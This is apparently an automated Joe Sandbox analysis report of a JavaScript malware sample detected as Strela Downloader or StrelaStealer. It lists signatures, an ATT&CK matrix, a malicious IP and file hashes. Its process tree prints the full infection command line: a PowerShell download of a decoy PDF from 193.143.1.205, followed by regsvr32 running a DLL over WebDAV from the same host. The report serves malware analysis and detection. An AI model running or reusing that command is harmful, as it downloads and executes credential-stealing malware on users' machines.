Windows
Analysis Report
6734200751517017767.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7752 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\67342 0075151701 7767.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7840 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\159 0210912710 0.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7848 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7892 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 8068 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7412 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 5900 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 24 --field -trial-han dle=1648,i ,137068522 1036914339 3,38543458 3214447652 6,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 1268 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588778 |
Start date and time: | 2025-01-11 05:24:03 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 55s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 19 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 6734200751517017767.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 162.159.61.3, 172.64.41.3, 3.233.129.217, 52.22.41.97, 52.6.155.20, 3.219.243.226, 2.23.242.162, 23.209.209.135, 199.232.214.172, 2.16.168.105, 2.16.168.107, 2.22.242.123, 2.22.242.11, 23.200.0.33, 23.200.0.21, 192.168.2.9, 13.107.246.45, 20.109.210.53, 104.126.112.182, 13.95.31.18, 172.202.163.200
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, azureedge-t-prod.trafficmanager.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- VT rate limit hit for: 6734200751517017767.js
Time | Type | Description |
---|---|---|
23:24:56 | API Interceptor | |
23:25:00 | API Interceptor | |
23:25:00 | API Interceptor | |
23:25:07 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.49319094158246357 |
Encrypted: | false |
SSDEEP: | 1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Zta+:cJhXC9lHmutpJyiRDeJ/aUKrDgnmI |
MD5: | 3EB0130D0ED39398D753A6A641B3A22C |
SHA1: | F898E5BEA682402ED6109335C1E4CBFC6FD40484 |
SHA-256: | A56A690DC85446D2091E6CFE8C23E7CF30601ECD9902EB0ED9A2DEDBF882A152 |
SHA-512: | 74AFE5B3EB80FA04DF3948559283029A425DA86D2AC853C57E48526F35141D6EE4076FAC2BA4890FF5D7DA6BE02AE4D3B8093EDBB978FC044A4894FE4D97BBC9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7216421083093915 |
Encrypted: | false |
SSDEEP: | 1536:bSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:bazaNvFv8V2UW/DLzN/w4wZi |
MD5: | 9F063263DC3CCF464141493E5ACF6F30 |
SHA1: | A40327AF0D296D07373EFA7851DB5D08EC273EE0 |
SHA-256: | 5C224905717F1B90D8C0D8C0166AF1BD3E08D5A1B10F017273DE1882E2186C68 |
SHA-512: | 9D4A6CDD2D09A60AEAA5172942C674C0E1E416672D6BDCE8FBB90612B75268C848711E0F8E3E8786E33261DD3EF541189381D04D6792A4C958E948F54187729B |
Malicious: | false |
Preview: |
